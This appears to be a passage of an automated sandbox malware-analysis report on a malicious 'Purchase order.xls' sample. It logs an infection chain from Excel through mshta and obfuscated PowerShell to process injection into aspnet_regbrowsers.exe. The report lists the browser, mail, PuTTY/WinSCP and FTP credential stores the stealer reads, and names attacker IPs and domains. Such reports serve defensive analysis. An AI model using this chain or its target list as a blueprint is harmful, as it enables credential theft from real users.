                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 26_2_00406069 GetUserNameW,26_2_00406069
                Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 26.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 3900, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: PopPassword26_2_0040D069
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: SmtpPassword26_2_0040D069
                Source: Yara matchFile source: 26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 26.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information121
                Scripting
                Valid Accounts23
                Exploitation for Client Execution
                121
                Scripting
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                2
                OS Credential Dumping
                1
                Account Discovery
                Remote Services1
                Archive Collected Data
                5
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts121
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                1
                Access Token Manipulation
                21
                Obfuscated Files or Information
                2
                Credentials in Registry
                2
                File and Directory Discovery
                Remote Desktop Protocol1
                Browser Session Hijacking
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts4
                PowerShell
                Logon Script (Windows)211
                Process Injection
                1
                Install Root Certificate
                Security Account Manager14
                System Information Discovery
                SMB/Windows Admin Shares2
                Data from Local System
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                DLL Side-Loading
                NTDS1
                Security Software Discovery
                Distributed Component Object Model11
                Email Collection
                115
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Masquerading
                LSA Secrets1
                Process Discovery
                SSH1
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                Virtualization/Sandbox Evasion
                Cached Domain Credentials21
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Access Token Manipulation
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                Process Injection
                Proc Filesystem1
                System Owner/User Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                Remote System Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1542327 Sample: Purchase order.xls Startdate: 25/10/2024 Architecture: WINDOWS Score: 100 87 Suricata IDS alerts for network traffic 2->87 89 Found malware configuration 2->89 91 Malicious sample detected (through community Yara rule) 2->91 93 20 other signatures 2->93 11 EXCEL.EXE 59 33 2->11         started        process3 dnsIp4 79 192.3.176.141, 49164, 49166, 49168 AS-COLOCROSSINGUS United States 11->79 81 qrisni.me 188.114.97.3, 443, 49163, 49165 CLOUDFLARENETUS European Union 11->81 65 C:\Users\user\...\Purchase order.xls (copy), Composite 11->65 dropped 67 greatthingswithgoo...dthingsgreat[1].hta, HTML 11->67 dropped 127 Microsoft Office drops suspicious files 11->127 16 mshta.exe 10 11->16         started        20 mshta.exe 10 11->20         started        file5 signatures6 process7 dnsIp8 69 qrisni.me 16->69 83 Suspicious powershell command line found 16->83 85 PowerShell case anomaly found 16->85 22 powershell.exe 24 16->22         started        71 qrisni.me 20->71 26 powershell.exe 20->26         started        signatures9 process10 file11 61 simplethingswithgr...ignsgivenmebest.vbS, Unicode 22->61 dropped 63 C:\Users\user\AppData\...\lwndurzh.cmdline, Unicode 22->63 dropped 107 Suspicious powershell command line found 22->107 109 Obfuscated command line found 22->109 28 wscript.exe 22->28         started        31 powershell.exe 4 22->31         started        33 csc.exe 2 22->33         started        36 wscript.exe 26->36         started        38 csc.exe 2 26->38         started        40 powershell.exe 26->40         started        signatures12 process13 file14 115 Suspicious powershell command line found 28->115 117 Wscript starts Powershell (via cmd or directly) 28->117 119 Windows Scripting host queries suspicious COM object (likely to drop second stage) 28->119 42 powershell.exe 28->42         started        121 Installs new ROOT certificates 31->121 57 C:\Users\user\AppData\Local\...\lwndurzh.dll, PE32 33->57 dropped 45 cvtres.exe 33->45         started        123 Bypasses PowerShell execution policy 36->123 125 Suspicious execution chain found 36->125 59 C:\Users\user\AppData\Local\...\3w1sxmqs.dll, PE32 38->59 dropped 47 cvtres.exe 38->47         started        signatures15 process16 signatures17 111 Suspicious powershell command line found 42->111 113 Obfuscated command line found 42->113 49 powershell.exe 42->49         started        process18 dnsIp19 73 drive.usercontent.google.com 142.250.186.161, 443, 49174 GOOGLEUS United States 49->73 75 drive.google.com 142.250.186.46, 443, 49173 GOOGLEUS United States 49->75 95 Writes to foreign memory regions 49->95 97 Injects a PE file into a foreign processes 49->97 53 aspnet_regbrowsers.exe 49->53         started        signatures20 process21 dnsIp22 77 94.156.177.220, 49176, 49177, 49178 NET1-ASBG Bulgaria 53->77 99 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 53->99 101 Tries to steal Mail credentials (via file registry) 53->101 103 Tries to steal Mail credentials (via file / registry access) 53->103 105 2 other signatures 53->105 signatures23

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Purchase order.xls16%ReversingLabs
                Purchase order.xls100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://crl.entrust.net/server1.crl00%URL Reputationsafe
                http://ocsp.entrust.net030%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://go.micros0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                http://ocsp.entrust.net0D0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                https://secure.comodo.com/CPS00%URL Reputationsafe
                http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                qrisni.me
                188.114.97.3
                truefalse
                  unknown
                  drive.google.com
                  142.250.186.46
                  truefalse
                    unknown
                    drive.usercontent.google.com
                    142.250.186.161
                    truefalse
